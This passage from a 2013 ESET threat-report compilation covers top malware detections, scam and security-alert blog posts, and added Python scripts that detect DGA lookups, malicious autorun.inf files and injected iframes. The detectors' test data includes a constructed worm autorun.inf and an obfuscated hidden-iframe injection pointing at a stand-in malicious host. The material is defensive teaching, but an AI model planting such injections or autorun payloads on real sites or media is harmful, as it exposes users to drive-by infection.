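2013-08-01T10:00:15 10.0.0.9 cpmsfuhgyd.ws NXDOMAIN
2013-08-01T10:00:16 10.0.0.9 cpmsfuhgyd.ws NOERROR
"""

if __name__ == "__main__":
    for client, r in analyze(SAMPLE_LOG).items():
        print(client, r)
    print("flagged:", flagged_clients(SAMPLE_LOG))
```

A single typo (the one NXDOMAIN from 10.0.0.5) stays well under the distinct-name threshold, while the second client crosses both thresholds after ten failed lookups. In production the same aggregation would run over a sliding time window, and the entropy test is a crude stand-in for a proper language model of legitimate labels; it exists here to show why volume of failures alone is not enough (a misconfigured search domain also produces many NXDOMAINs, but for the same few names).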

Keyboards and Keywords

David Harley, ESET Senior Research Fellow

A version of this article also appeared on the Anti-Phishing Working Group blog.

The Wikipedia entry for ‘error message’ includes a number of infamous (and confusing) error messages, though it doesn’t include my all-time favourite:

Keyboard not found! Press any key to continue

And no, that’s not an urban legend. While I’m not sure that was the exact wording, I did see more or less that same error message two or three times back in the days when user support was part of my job.

The reason that I was scouring the web for links related to ‘error messages’ and ‘security alerts’ is this: I happened across an article on the American Psychological Association web site that told me that Gary Brase (a psychologist) and Eugene Vasserman (a computer security researcher), of Kansas State University, have been given a $150,000 grant for research into developing more effective online alerts. I don’t know how many security companies have explored this approach – though I don’t believe for a moment that no security company has ever involved psychologists, focus groups, and ergonomists (amongst others with interest and expertise in aspects of human-computer interaction) in the development of a product and its user interface – but I’m sure we’ve all seen enough in the way of confusing software-generated alerts to agree that some software could do with a little more attention to the HCI dimension. There is a special place in my heart for the sort of alert that we often see along the lines of ‘EICAR test virus not-a-virus detected’.

In fact, while I may be biased – my own academic background was originally in social sciences, computer science being a later add-on – I don’t think that computer security that’s focused entirely on bits and bytes is ever going to solve the world’s problems with cybercrime, cyber-espionage, and all the other cyber-issues du jour. Certainly the kind of security alert that leaves the user wondering “What the heck does that mean? What does the darn thing want me to do?” is failing some kind of usability test.

The APA article includes a couple of examples cited by Brase:

“Do you want to trust this signed applet?” or “This application’s digital signature has an error; do you want to run the application?”

Frankly, I’ve seen far more confusing examples guaranteed to have the end user running to the nearest wall to bang his head against it. Such as any message that includes an error code or a hex string, or something like ‘unknown error scanning file [filename]’, or even a blank message box, but these examples do finger an essential problem with security alerts that I’m not sure $150k is going to be enough to fix.

The problem with Brase’s examples isn’t the wording, it’s conceptual. If the algorithm behind the program isn’t able to make a reliable determination of the risk, why should we expect the everyday user to be able to? Actually, he might: maybe he knows that a site is (normally) OK, even if he can’t be sure that it hasn’t been compromised in some way. Software has the disadvantage that it can only deduce intent from the programmatic characteristics of a program, or from automated textual analysis. And while filtering has progressed immeasurably from the days when phrases like ‘magna cum laude’ or the name Scunthorpe triggered porn detection algorithms all over the globe, there are still many contexts where an informed human being can make a better decision than an email or web filter. But ‘informed’ people aren’t the main target for research like this: rather, Brase states that “Good security alerts should be tailored for all types of users, no matter what their intent,” which suggests a wide range of skill/knowledge levels, as well as a wide range of target sites. There’s an important point there: I’m in agreement with being in touch with the intent of the user as well as that of the malefactor. In fact, Jeff Debrosse and I wrote a paper a few years ago in which we suggested that security companies could increase their effectiveness by incorporating analysis of the user’s behaviour into the software as well as analysis of programmatic behaviour – Malice Through the Looking Glass: Behaviour Analysis for the Next Decade – though I’m not holding my breath waiting for that approach to catch on. It is one way, potentially, of addressing another of Brase’s points: i.e. that ‘user education has not kept pace with the increasing complexity of Internet transactions.’ That, at least, is perfectly true. I’m all for making computers people-literate (the very apposite title of a book by Elaine Weiss).

The logical flaw here, though, is this: improving the presentation of security alerts won’t make security software (or other software with some security functionality, such as a browser using technology like Google’s Safe Browsing, for example) any more capable of discriminating between human motivation than it already is. That’s not such a negative comment as it sounds: programmatic filters don’t in themselves ‘detect’ malicious intent, but they do reflect the programmer’s understanding of some behaviour – programmatic or semantic – characteristic of malicious intent. But malicious behaviour is not a constant, not static. The average security program is a long way from achieving the same discrimination in analysing textual content that a moderately psychologically-aware human being is capable of.

The Google technology is actually a pretty good illustration of the limitations of technology for countering attacks that are primarily social engineering. Google tells us that Safe Browsing currently flags an impressive 10,000 sites per day as malicious, data that it now draws on for its Transparency Report. Yet phishing is considered to be a more effective attack than ever, many years after it first came to prominence as a major threat, though email is no longer its primary entry point, whereas web browsers and web-hosted services such as social media account for a high proportion of phish delivery.

This is by no means a criticism of Safe Browsing, which is a very useful layer of protection for web users (not just Chrome users – the technology is used by Firefox and Safari too), and I applaud their efforts. After all, anti-malware technology isn’t capable of detecting 100% of malicious programs and URLs either: if it were, this would be a very different world. For a start, we wouldn’t need to pop up any alerts asking users to answer questions they don’t understand: we’d simply tell them that the site or application they were trying to access would not be allowed to run, as the app believed it to be malicious.

But here in the real world, we need to bear in mind that there are plenty of malicious sites and other vectors out there – our lab processes several hundred thousand threats per day, and they don’t all come from those 10,000 web sites. So while Google’s Transparency Report statistics may prove interesting and useful – and no doubt have some PR value – end users should continue to be vigilant and take care in selecting which sites they visit, rather than assuming that they can click where they like because they have protection.

It’s not all bad news, though. I’ve just seen what may be the most inept 419 scam email of all time.

  • The sender is one Gen Peter Blay
  • The subject line reads “1”
  • The body text: well, technically, there is no body text. However, there is a signature: “your retrieve donation”

It’s hard to believe that there is anyone naïve enough to fall for that. Not least because it’s unclear from that what the scam actually is (presumably some form of advance fee fraud, though), let alone what the scammer needs the victim to do in order to execute the scam.

In other contexts, I’d probably write this off as an example of a spammer/scammer test run. In this case, though, I’m in some doubt as to whether he’ll work out how to do a 419 spam run before he expires from starvation. But perhaps I’m doing him an injustice. In that case, Gen Pete, just send the million dollars to me care of the ESET North America office.

Monthly Threat Report: March 2013

Analysis of ESET LiveGrid®, a sophisticated malware reporting and tracking system, shows that the highest number of detections this month, with almost 3.59% of the total, was scored by the INF/Autorun class of threat.


The Top Ten Threats

1. INF/Autorun

Previous Ranking: 1
Percentage Detected: 3.59%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While using this mechanism can make it easy to spot for a scanner that uses this heuristic, it’s better, as Randy Abrams has suggested in our blog (http://www.eset.com/threat-center/blog/?p=94; http://www.eset.com/threat-center/blog/?p=828) to disable the Autorun function by default, rather than to rely on antivirus to detect it in every case. You may find Randy’s blog at http://www.eset.com/threat-center/blog/2009/08/25/now-you-can-fix-autorun useful, too.
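As an added example (not ESET's code or its INF/Autorun signature), a Python triage script that parses an autorun.inf and scores the traits that separate a vendor installer's file from a worm's: launching an executable out of a hidden system folder, overriding Explorer's shell verbs, mimicking the AutoPlay "Open folder" prompt, or padding the file with junk lines. The three autorun.inf samples are constructed.

```python
"""Heuristic triage of autorun.inf contents, in the spirit of the INF/Autorun
detection described above. Added example, not ESET's code or signature."""
import re
from dataclasses import dataclass, field

# Directives under [autorun] that make Windows launch a program automatically.
LAUNCH_KEYS = {"open", "shellexecute"}
# Extensions that Autorun worms typically use for the payload dropped on the drive.
EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".cmd", ".bat", ".com", ".vbs", ".js")
# Folders a genuine installer never launches from; worms use them because Explorer hides them.
HIDDEN_DIRS = ("recycler", "recycled", "$recycle.bin", "system volume information")
SUSPICIOUS_THRESHOLD = 2  # total score at which the file is called suspicious
JUNK_THRESHOLD = 5        # junk lines before the file is called padded/obfuscated


@dataclass
class AutorunInfo:
    sections: dict = field(default_factory=dict)  # {section: {key: value}}, lower-cased
    junk_lines: int = 0  # lines that are neither section header, comment nor key=value


@dataclass
class Verdict:
    score: int
    reasons: list

    @property
    def suspicious(self) -> bool:
        return self.score >= SUSPICIOUS_THRESHOLD


def parse_autorun(text: str) -> AutorunInfo:
    """Tolerant INI parse: junk lines are counted instead of aborting, because
    padding the file with garbage is itself a signal worth keeping."""
    info = AutorunInfo()
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        header = re.fullmatch(r"\[([^\[\]]+)\]", line)
        if header:
            current = header.group(1).strip().lower()
            info.sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            info.sections[current][key.strip().lower()] = value.strip()
        else:
            info.junk_lines += 1
    return info


def program_path(value: str) -> str:
    """First token of a launch directive, without quotes or arguments."""
    tokens = value.split()
    return tokens[0].strip('"').lower() if tokens else ""


def triage_autorun(text: str) -> Verdict:
    info = parse_autorun(text)
    auto = info.sections.get("autorun", {})
    score, reasons = 0, []

    def hit(points: int, reason: str) -> None:
        nonlocal score
        score += points
        reasons.append(reason)

    # Everything that can run code: open=, shellexecute= and shell\<verb>\command=
    verbs = [k for k in auto if k.startswith("shell\\") and k.endswith("\\command")]
    targets = [program_path(auto[k]) for k in auto if k in LAUNCH_KEYS or k in verbs]
    if any(t.endswith(EXECUTABLE_EXT) for t in targets):
        hit(1, "launches an executable")  # installers do this too, so low weight
    if any(d in t for t in targets for d in HIDDEN_DIRS):
        hit(2, "payload hidden in a system folder")
    if verbs:
        hit(2, "overrides Explorer shell verbs (runs on double-click even with AutoPlay off)")
    if "open folder" in auto.get("action", "").lower():
        hit(2, "action text mimics the AutoPlay 'Open folder' prompt")
    if info.junk_lines >= JUNK_THRESHOLD:
        hit(2, f"padded with {info.junk_lines} junk lines (obfuscation)")
    return Verdict(score, reasons)


# Constructed samples: a vendor-CD style file, a worm-style file, a junk-padded file.
BENIGN_INF = "[autorun]\nopen=setup.exe\nicon=setup.exe,0\nlabel=Product Installer\n"
WORM_INF = r"""[autorun]
open=RECYCLER\S-1-5-21-0-0-0-500\update.exe
shell\open\command=RECYCLER\S-1-5-21-0-0-0-500\update.exe
shell\explore\command=RECYCLER\S-1-5-21-0-0-0-500\update.exe
icon=%SystemRoot%\system32\shell32.dll,4
action=Open folder to view files
"""
PADDED_INF = "[autorun]\nxj3#Lq!\n@@@@@@\n]]]]]\nopen=sys.exe\n{}{}{}\n??!!??\nk9\n"

if __name__ == "__main__":
    for name, inf in (("benign", BENIGN_INF), ("worm", WORM_INF), ("padded", PADDED_INF)):
        v = triage_autorun(inf)
        print(f"{name}: suspicious={v.suspicious} score={v.score} {v.reasons}")
```

Disabling Autorun, as the text recommends, removes the `open=` path entirely; the shell-verb check is there because that override still fires when a user double-clicks the drive in Explorer.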

2. Win32/Sality

Previous Ranking: 3
Percentage Detected: 2.19%

Sality is a polymorphic file infector. When run, it starts a service and creates or deletes registry keys related to security activities on the system, ensuring that the malicious process is started on each reboot of the operating system.
It modifies EXE and SCR files and disables services and processes related to security solutions.
More information relating to a specific signature:
http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

3. HTML/ScrInject.B

Previous Ranking: 4
Percentage Detected: 2.10%

Generic detection of HTML web pages containing obfuscated script or iframe tags that automatically redirect to the malware download.

4. Win32/Dorkbot

Previous Ranking: 5
Percentage Detected: 2.09%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor and can be controlled remotely. The file is run-time compressed using UPX.
The worm collects user names and passwords when the user browses certain web sites, then attempts to send the gathered information to a remote machine.

5. Win32/Ramnit

Previous Ranking: 6
Percentage Detected: 1.79%

Win32/Ramnit is a file infector: a virus that executes on every system start. It infects DLL and EXE files and also searches HTM and HTML files in order to write malicious instructions into them. It exploits a vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotely to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files, or shut down/restart the computer.

6. Win32/Conficker

Previous Ranking: 7
Percentage Detected: 1.42%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders. In view of all the publicity Conficker has received and its extensive use of a vulnerability that’s been remediable for so many months, we’d expect Conficker infections to be in decline by now if people were taking these commonsense precautions. While the current ranking looks like a drop in Conficker prevalence, this figure is affected by the changes in naming and statistical measurement mentioned earlier: there’s no indication of a significant drop in Conficker infections covering all variants.

7. HTML/Iframe.B

Previous Ranking: 2
Percentage Detected: 1.29%

Type of infiltration: Virus
HTML/Iframe.B is generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location with malicious software.
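For the two generic detections above (HTML/ScrInject.B's obfuscated script or iframe injections, and HTML/Iframe.B's malicious IFRAME tags), here is an added Python scanner, not ESET's code, that flags a hidden IFRAME pointing off-site and a document.write of URL-encoded frame markup; the sample page and its host names are constructed.

```python
"""Scanner for injected IFRAME redirections in an HTML page. Added example, not
ESET's HTML/ScrInject.B or HTML/Iframe.B detection; the sample page is constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Inline styles that keep a frame in the page but out of the user's sight.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.I)
# Script idioms typical of an injected, obfuscated redirect: document.write of
# URL-encoded or char-code-built markup, or eval of a decoded string.
OBFUSCATION = re.compile(r"unescape\s*\(|fromcharcode\s*\(|%3ciframe|eval\s*\(", re.I)


def _dimension(value):
    """'0', '0px', '1' -> int; missing or non-numeric -> None."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


class IframeScanner(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []
        self._script = None  # text chunks collected while inside <script>

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            self._check_iframe(a)
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            self._check_script("".join(self._script))
            self._script = None

    def _check_iframe(self, a):
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        tiny = any(d is not None and d <= 1
                   for d in (_dimension(a.get("width")), _dimension(a.get("height"))))
        hidden = tiny or "hidden" in a or bool(HIDDEN_STYLE.search(a.get("style", "")))
        # A visible frame, or a hidden frame served from the page's own host, is not flagged.
        if hidden and host and host != self.page_host:
            self.findings.append({"kind": "hidden_iframe", "host": host, "src": a["src"]})

    def _check_script(self, code):
        if "document.write" in code.lower() and OBFUSCATION.search(code):
            decoded = unquote(code)  # reveal %3Ciframe ... %3E payloads to the analyst
            hosts = sorted(set(re.findall(r"https?://([\w.-]+)", decoded)))
            self.findings.append({"kind": "obfuscated_script", "hosts": hosts, "decoded": decoded})


def scan_html(html, page_host):
    """Return the list of findings for one page, in document order."""
    scanner = IframeScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed page: one legitimate widget frame, one hidden off-site frame, one
# document.write() that builds a further hidden frame from a URL-encoded string.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="https://www.example.com/widget" width="300" height="200"></iframe>
<iframe src="http://bad.example.net/in.php" width="0" height="0" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Ciframe src=%22http://bad.example.net/x.php%22 width=0 height=0%3E%3C/iframe%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE, "www.example.com"):
        print(finding)
```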

8. HTML/Fraud

Previous Ranking: 45
Percentage Detected: 1.06%

HTML/Fraud is a trojan that steals sensitive information, like telephone numbers and e-mail addresses, and attempts to send the data to a remote machine. The trojan displays a dialog window asking the user to take part in a short survey, in order to persuade him to fill in personal information. The trojan contains a list of URLs and the HTTP protocol is used.

9. Win32/Qhost

Previous Ranking: 8
Percentage Detected: 0.98%

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.

10. JS/TrojanDownloader.Iframe.NKE

Previous Ranking: 9
Percentage Detected: 0.94%

It is a trojan that redirects the browser to a specific URL location with malicious software. The program code of the malware is usually embedded in HTML pages.

Bank Fraud and Job Scams

David Harley CITP FBCS CISSP, ESET Senior Research Fellow

Today I found a particularly endearing example of the 419 (advance fee fraud) scam in my mailbox.

The sender, one ‘Harry Cole’ claims to represent a bank called the IFC (presumably that’s the International Finance Corporation) and says that an ‘inquest’ (sounds like a matter of ‘grave’ concern) conducted by the bank turned up an ‘inactive/dormant’ account, and that I’m a ‘potential beneficiary to an unclaimed sum.’

Sounds interesting? Not really: this is a terse variation on a type of 419 where the scammer claims that he can cut you in on a bank account belonging to someone who died suddenly and intestate or without any known heirs, and that otherwise the money will go to some undeserving party such as corrupt government officials or into the bank’s own coffers. (That’s supposed to allow you to justify to yourself the fact that you’re agreeing to engage in a form of fraud. On the other hand, the fact that you know deep down that you would be defrauding the bank is also an effective way of discouraging you from reporting the scam when you realize you’ve been had.) If the recipient of the email is naïve enough to follow through, in due course he’ll find himself required to make various payments before the money can be transferred (hence advance fee fraud), which of course will never happen.

What makes it somewhat endearing in a dopey sort of way is that the ‘hook’ for this scam is that ‘the similarity in your name and email makes it possible for us to liquidate the deceased account in your favour.’ I wonder how they knew that my middle name is AskESET?

Yep. As interest in the new ESET blog and resources site at http://welivesecurity.com grows, so does the volume of scams and spams sent to our contact address askeset@eset.com. In fact, I used one of them as the basis for a recent blog: Job Scams: Nice Work If You Can Get It. A short extract:

“The new ESET blog format must be striking a real chord with people. At any rate, job offers are just pouring in. Except that they don’t seem to be jobs for security bloggers, or for web developers like the team that maintains this site.

What qualifies us for an unspecified role in a hotel in Canada, I wonder? Perhaps they need someone to polish their emails. Some of the wording has a strong whiff of the West African 419, and after all, we’re not short of editing talent round here. But as our colleagues at ESET Ireland pointed out recently, at a time when the global economy is in crisis, there are all too many people solving their own employment and financial problems by scamming the unemployed, and job scams are an obvious way of grabbing their attention.”

Blots on the Threatscape

David Harley CITP FBCS CISSP, ESET Senior Research Fellow

Recently, I was asked for some commentary on the effects of viruses in the enterprise. Finding myself writing far more than the journalist could possibly use, I thought you might find some of the content I produced interesting and/or useful. (Always the optimist…) Like many requests from journalists, this one took the form of some specific questions.

  • What are the key virus threats?

Strictly speaking, viruses in a technical sense – that is, self-replicating malware – are a pretty small blot on the threatscape, though from time to time something will come along and have a major impact. Stuxnet and its siblings, for instance, have had an impact out of proportion to the relatively small number of infections. But most people outside the security industry these days use the term as interchangeable with malware (malicious software). In fact, most malware nowadays is not self-replicating, but spread by other means such as spam campaigns.

Some of the significant malware and related attacks we see today include:

  • Banking Trojans ranging from Zeus and its siblings to Carberp
  • Ransomware (malware that encrypts your data or denies you access to your PC, then demands that you pay to get it back)
  • Phishing, which may involve the use of some form of Trojan
  • Bots that give the attacker the opportunity to control large groups of machines (botnets) for a variety of criminal activities: spam, phish and malware dissemination, Distributed Denial of Service attacks (often for purposes of extortion), captcha cracking.
  • Targeted attacks (see below)

Our current top ten, which you’ll find later in this document, gives you some idea about the most prevalent detections worldwide. However, some of our detections are highly generic, meaning that because of the use of advanced heuristics, a single detection might include specimens of malware that have common characteristics, but aren’t necessarily related in the sense of belonging to the same family or originating with the same gang. For instance, in the list below:

  • INF/Autorun includes all kinds of disparate malicious code that attempts to use the Windows Autorun/Autoplay mechanism to infect systems. While modifications to recent versions of Windows have severely curtailed the effectiveness of this infection vector, the figures indicate that there is still plenty of malware out there that includes code to misuse it.
  • Kryptik detections don’t describe a single Trojan family, but a wide range of malcode that shares certain coding techniques.
  • ScrInject is a class of malware that redirects a browser to a malicious URL.
  • Dorkbot is a bot that owes its position in the top ten to the fact that it’s extraordinarily widespread in South America and has been since 2011.

Note that the percentages relate only to instances of malware flagged by our telemetry – our software includes an option to report it to the ESET lab when an attempt to infect the machine it protects is detected. This gives us some feel for prevalence and – perhaps more importantly – the opportunity to refine our detections, but doesn’t say anything about the absolute numbers of infected machines worldwide. We don’t publish absolute numbers because they can be misleading.

However, some very significant malware doesn’t get anywhere near the top ten. The kind of stealthy, targeted threat that the security industry sometimes calls an APT (Advanced Persistent Threat) may remain undetected for long periods because of its very limited spread. Stuxnet was an interesting example of malware that finally got noticed because infections suddenly started to accelerate. ESET at first detected it heuristically, then developed Stuxnet-specific detections because there was a spike in infections. But the term ‘spike’ is relative: the numbers behind the percentages we see in the top ten are usually much higher than Stuxnet ever reached.

  • How do they weasel their way in and what can you do about it?

Most malware relies partly or completely on social engineering. Spam campaigns via email, the social media and so on, try to lure victims to sites booby-trapped with malicious code. Sometimes the site is legitimate but has been compromised by some form of hacking. The malicious code may be self-launching (drive-by downloads) or may be in the form of a malicious binary passed off as something desirable or useful. Targeted threats often exploit vulnerabilities in certain types of document (often PDFs, nowadays), and may be delivered as an attachment to mail or instant messaging. Email filters and similar defences are more likely to let a document through as an attachment than a program, especially if they use some form of 0-day exploit. However, they still rely on fooling the victim into opening the attachment. Criminal gangs use a variety of techniques to make it harder to detect malware, such as using legitimate programs and services like AMMYY to open a backdoor into an infected machine, or chaining together software components and web redirections where the unequivocally malicious code is at the end of the chain, so that even where the malcode is known, it won’t necessarily be seen by an antivirus scanner unless it’s able to step through the entire chain of steps.

This may seem like a weird thing for an AV researcher to say, but don’t rely on antivirus software. Multi-layered protection such as that used by well-protected corporates fills many of the gaps that AV can’t reach: even if it doesn’t recognize malware as such, it blocks some of the avenues that malware uses to get a foothold. Some ISPs and mail providers also use some of the tools that a large corporate uses (firewalling, intrusion detection and prevention, and so on) but a home user can also benefit from some similar technologies on the desktop using a proper security suite. Free antivirus programs are a lot better than nothing, but they don’t offer the same protection or support. When so many people are using their own devices at work, or working from home at least some of the time on their own PCs or other devices, it’s important that organizations take the protection of those devices into account when they consider the security of the organization as a whole.

  • Prevention is still better than cure, but what can you do if the worst happens?

Sometimes it’s easier to rebuild a system than to clean it, especially in a corporate environment, but it’s probably not necessary nearly as often as some sectors of the security industry will tell you. In fact, under these circumstances a good support contract is a welcome return on investment (apart from its value in terms of installation and maintenance support). Some large companies (Lockheed Martin and Boeing spring to mind) invest in trained professionals with very specific expertise in dealing with malware, reflecting the fact that such companies are often the first to see certain kinds of new threat family. Even small companies sometimes have in-house expertise – my own reputation, such as it is, was originally based on managing anti-virus for a medical research organization with fewer than 2,000 users. But sometimes significantly larger companies don’t have an in-house expert on malware or security on tap, and not all system administrators have the knowledge to deal with a serious local infection situation. So it makes sense to evaluate a security product’s support structure, not just its unit cost. Or consider outsourcing some security support, or factoring in the cost of training internal IT staff.

  • How can a virus infection harm the reputation of a company?

It would be unprofessional to discuss specific companies whose management of a breach I’ve been involved with personally, and discussion of other incidents is often speculative. I would say, though, that the most embarrassing virus incidents are those where the malware is well-known enough that you’d expect a well-protected organization to recognize and deal with an attack earlier than actually happened. However, a less well-protected organization may not be able (or willing) to identify the exact cause of a breach. In many countries, legislation exists that obliges a company to inform its customers when a breach endangers customer data, but not necessarily to give other details of the breach. When a company says, in effect, that it was attacked using an APT, there are often grounds for suspecting that what it means is “we screwed something up and we’re not sure how, but we don’t want you to think it’s our fault.” In an era where targeted attacks are increasingly frequent and inflicted on a wide range of organizations, my feeling is that those organizations limit reputational damage better if they can say “we got something wrong, here’s what happened, and here’s what we’re doing to reduce the chances of its happening again.” It doesn’t have to be incredibly detailed – in fact, it may be bad security practice to give away too much information – but it does have to show that the company is genuinely managing the security problem, not just the PR problem.

Monthly Threat Report: February 2013

Academic Vanity Press: Who Gets Scammed?

David Harley CITP FBCS CISSP, ESET Senior Research Fellow

A version of this article was originally published by the Anti-Phishing Working Group in its eCrime blog.

I’m not a regular denizen of the ivory halls and towers of academia, despite having the title Senior Research Fellow at ESET and being a Fellow of the BCS Institute (the current name for the British Computing Society). However, I’ve recently become aware of a journal paper submission scam for which even a quasi-academic is apparently a suitable target. At any rate, I recently received a minor blizzard of emails offering me the opportunity to submit a paper to one of several dozen open-access, peer-reviewed online journals, and to join them as an editorial board member or reviewer.

People do ask me to write, edit or review for them from time to time – after all, my primary job is authoring – but they’re usually rather more precise about which site or publication they want me to contribute to. They don’t let me choose from a variety of publications in disciplines of which I have no experience whatever. Most of them don’t expect to pay me for my efforts, but that’s fine: people who write blogs and papers that are published by a security company usually also write on behalf of the same company for reputable third parties like the Anti-Phishing Working Group, local press, specialist security magazines, and so on. The third party gets a wider spread of expertise than if it only used in-house staff, especially if the writer is already established; the security company and the author get a wider audience and are seen as a force in the knowledge-sharing research community, not just a marketing operation.

However, in this case it was money that was wanted, not my presumed expertise or reputation. The spammer doesn’t seem to know what my field of expertise actually is. And it turns out that if you want to be an editor or reviewer, you first have to submit a paper. The cost of processing the article (copyedit, proofreading, and publication on acceptance) is up to $500 (but would have entailed a very substantial discount if I’d submitted it before January). It turns out that some similar organizations charge 3-4 times that much, though again they often offer impressive discounts.

Welcome to the seamier side of Open Access. Not that OA is in itself fraudulent. In principle, it provides unrestricted access to scholarly, peer-reviewed journal articles. Instead of the reader paying for access (for example, by paying a yearly subscription fee or for individual articles), the business model is largely reliant on the cost of publishing being borne by the author. It’s actually quite a complex and varied model, but for many academics and academic departments, publications constitute an essential performance metric, a numbers game that boosts their claim to tenure and gives them an advantage in the job market. Research information is both a core product and a marketing asset, so it can work very well.

However, it may come as no surprise that there are journals whose review process is less rigorous than you’d expect. On the other hand, what may be more surprising is how many Open Access journals have little or no content, or cheerfully include articles from disciplines different to the one indicated by the journal title, or include names on editorial and review boards of people who have never agreed to participate, or whose credentials are seriously misrepresented. I guess it’s not a scam if you get what you want out of it: if buying your bibliography by the yard – the way some people buy books for their study – makes your résumé look more attractive, you may consider it worth the money. But if you obtain and maintain your position by buying credibility at the expense of those who earn theirs, doesn’t that mean that an academic employer is being cheated, and the academic community as a whole being short-changed? Is there a lot of difference between buying exposure in a dubious pseudo-academic publication and buying yourself a degree from an email spammer?

Free Isn’t Always Better

David Harley CITP FBCS CISSP, ESET Senior Research Fellow

A different version of this article was originally published on the ESET blog.

ESET Ireland’s Urban Schrott has blogged recently that “Research reveals nearly half of all Irish computers depend on free antivirus for protection”. That proportion isn’t in itself surprising: there are several options for anti-virus products that don’t cost anything for home users, and plenty of people who “believe that a free antivirus is equally effective in keeping their computers safe as a full security suite,” and more than a few irresponsible ‘security experts’ suggesting on the basis of spurious statistics and imperfect misunderstanding (hat tip to Kurt Wismer) of modern anti-malware technology that AV is not worth paying for.

Urban notes:

“Online security these days goes far beyond just sets of virus definitions as was the case with antivirus a decade ago. The multiple-vector attack nature of modern malware and cybercrime in general forces effective security suites to integrate antivirus, firewall, anti-spam, social media scanners and scam-site detectors, using traditional definition-based malware recognition, combined with proactive, behavioural heuristic detection. That is then also backed up by large teams of security experts and analysts, who monitor the web 24/7 for new outbreaks and new forms of attack as well as offer tech support to their users.”

But his statistics (based on a poll commissioned by ESET Ireland) also throw up some interesting sidelights on consumer habits and attitudes that I’m sure are reflected in other parts of the world.

  • 45% of users use free AV, which is a lot better than being one of the 5% using no security software at all (as long as you’re using a competent mainstream program and you’re not one of the “3% minority … mad enough to use pirated antivirus.”)
  • Still, it’s actually quite encouraging that a good proportion of those surveyed use a licensed security suite or a licensed AV product in combination with other security software. Not only because licence payments for anti-malware keep people like me in steak and Merlot, but because it shows that there are people with a healthy recognition that AV is not sufficient protection.

There’s also some demographic analysis indicating that women are more cautious (and likelier to pay for security software) than men, while the youngest age-group is also the most reckless. (This is well in line with other research from the same source.)

Inevitably, one comment posted to the ESET Ireland blog accused Urban of ‘lame FUD’, to which he responded trenchantly: “It isn’t FUD to say that AV (free or not) doesn’t have the same defensive capabilities as a security suite, or that free AV isn’t as well supported as its for-fee equivalent. That’s the trade-off and we’re far from the only ones saying it.”

In fact, the AV market is not simply divided into free and commercial scanners. There are a few scanners that are completely free, though I can’t think of one I’d recommend. There are scanners that are free for non-commercial use. There are short-life evaluation copies of commercial scanners (and even full suites) like ESET’s 30-day trials. There are free web-based scanners (we have one of those, too), though they’re not a complete substitute for a full-blown AV product, free or otherwise. There are fully supported commercial scanners that don’t have all the bells and whistles of a security suite (best used in tandem with other types of security software such as a personal firewall). And there are full-blown security suites, which provide multilayered protection but are hardly ever free.

While free AV doesn’t contribute anything to my steak and Merlot fund, it’s a good thing that people are using it: as long as it’s a legitimate and competent product, it’s a great deal better than no protection at all. But it’s a dangerous world out there, and free AV doesn’t mitigate as many risks as a full suite, and it isn’t as well supported. To claim otherwise is just wishful thinking.

Righard Zwienenberg went into considerable detail on the ‘hidden costs’ of free AV in Why Anti-Virus is not a waste of money.

Job Scammers Will Take Anyone’s Money

Urban Schrott, IT Security & Cybercrime Analyst, ESET Ireland
David Harley, Senior Research Fellow, ESET North America

